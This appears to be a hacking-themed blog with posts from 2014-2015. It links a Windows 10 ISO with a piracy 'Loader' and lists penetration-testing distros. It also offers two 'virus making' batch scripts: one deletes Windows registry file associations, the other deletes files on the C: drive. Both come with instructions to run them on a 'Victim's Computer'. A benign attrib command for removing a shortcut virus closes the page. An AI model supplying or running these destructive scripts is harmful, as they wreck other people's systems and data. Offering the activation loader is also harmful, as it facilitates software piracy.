Wednesday, 5 August 2015

Download Windows 10 Enterprise x64bit and Loader

Download Windows 10 and Loader



Windows 10 is familiar and easy to use, with lots of similarities to Windows 7 including the Start menu. It starts up and resumes fast, has more built-in security to help keep you safe, and is designed to work with software and hardware you already have.
The Windows Insider Programme is a global community of fans who love Windows and want to help make it better. Insiders see the operating system in its earliest stages, and play a role in shaping it. Their feedback has contributed to the best Windows ever.
Windows 10 comes with great built-in apps4 like Maps, Photos, Mail & Calendar, Music, Films & TV. And these apps use OneDrive to back up your information and sync seamlessly across your Windows 10 devices, so you’re never far from what you need.
Windows 10 is Grateful for Gamers It Comes with the DirectX version 12.



System Requirements

  • Processor:
    1 gigahertz (GHz) or faster processor or SoC
  • RAM:
    1 gigabyte (GB) for 32-bit or 2 GB for 64-bit
  • Hard disk space:
    16 GB for 32-bit OS 20 GB for 64-bit OS
  • Graphics card:
    DirectX 9 or later with WDDM 1.0 driver
  • Display:
    800x600
"If you want to upgrade to Windows 10 on your PC or tablet, here’s what it takes. For more information about the free upgrade offer1, please visit theWindows 10 Upgrade page for details." but if You want to use iso to install You need to buy a key.
DOWNLOADS:-
Download Windows 10 64bit Enterprise iso

Windows 10 Loader Download



Monday, 3 August 2015

TOP 5 OS FOR HACKERS

TOP 5 OS FOR HACKERS.



If you're Hacker, you need a proper OS for it. Here we bring top 10 Linux hacking distros... 

1.  Kali Linux

Kali Linux is an advanced penetration testing tool that should be a part of every security professional’s toolbox. Penetration testing involves using a variety of tools and techniques to test the limits of security policies and procedures. What Kali has done is collect just about everything you’ll need in a single CD. It includes more than 300 different tools, all of which are open source and available on GitHub.





2.NodeZero


This is another Ubuntu-based hacking, which is used for penetration testing. Every time you get a patch for bugs in the Ubuntu OS, Nodezero also gets updated.Penetration testing and security auditing requires specialist tools.The natural path leads us to collecting them all in one handy place. However how that collection is implemented can be critical to how you deploy effective and robust testing. All though NodeZero Linux can be used as a “Live System” for occasional testing, its real strength comes from the understanding that a tester requires a strong and efficient system. This is achieved in our belief by working at a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable linux environment.




3. BackBox Linux

This is yet another Ubuntu-based distro being used for hacking. According to the developers, the OS has been designed to create a penetration testing distro that is fast and easy to use. It also gets update with new ethical hacking tools regularly using repositories.




4. Samurai Web Testing Framework

This distro lays focus on attacking websites using the best free and open source tools for hacking and attacking. The developers have incorporated four steps into the distribution, including, reconnaissance, mapping, discovery and exploitation.




5.Blackuntu

Ubuntu itself may not be a hacking distro, but there are plenty that are based on it. This distribution comes with categories such as Network Mapping, Information Gathering, Penetration, Vulnerability Identification, Privilege Escalation, Radio Network Analysis, VoIP analysis and more.




This is the best 5 OS For Hacking and pentesting...

Wednesday, 22 July 2015

Destroy the registry

Make A Virus:-

Destroy the registry


"This is virus is highly risky. There is no recovery after using this..."


You need to write this Program in Notepad.exe

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your message here.
GOTO MESSAGE

SAVE THIS WITH  .bat file and run into Victim's Computer. And That PC is Done For It.

This Information is Knowledge Only!  

Monday, 20 July 2015

This Virus Deletes All the Data From Drive

VIRUS MAKING:

This Virus Deletes All the Data From Drive







Trick:

@Echo off

Del C:\ *.* |y



Save The Above Code a .bat file in Notepad and Run into Victim's Computer 
You Can Replace Drive tag.

I am not responsible for any damage.  it all on Your own risk.

Friday, 12 December 2014

Sunday, 23 November 2014

How to Remove Shortcut Virus From Pendrive

Remove Shortcut Virus From Pendrive


One such frustrating virus is well known ‘shortcut virus’. 


Antivirus software may detect the virus but can’t delete it from USB drive.


When ever the USB affected with shortcut virus,every piece of  data in it is shown as shortcut and Some time it will not be opened.





Now how to recover data and remove the virus:-


Step 1: Open CMD. (start > Run > cmd)

Step 2: now type:- attrib -h -r -s /s /d G:\*.*    
    
    "(G: is my USB drive letter. Replace with your USB letter)"

Step 3: Enter

Now Check your data....and Enjoy!!!!!!!!!!

You're Done!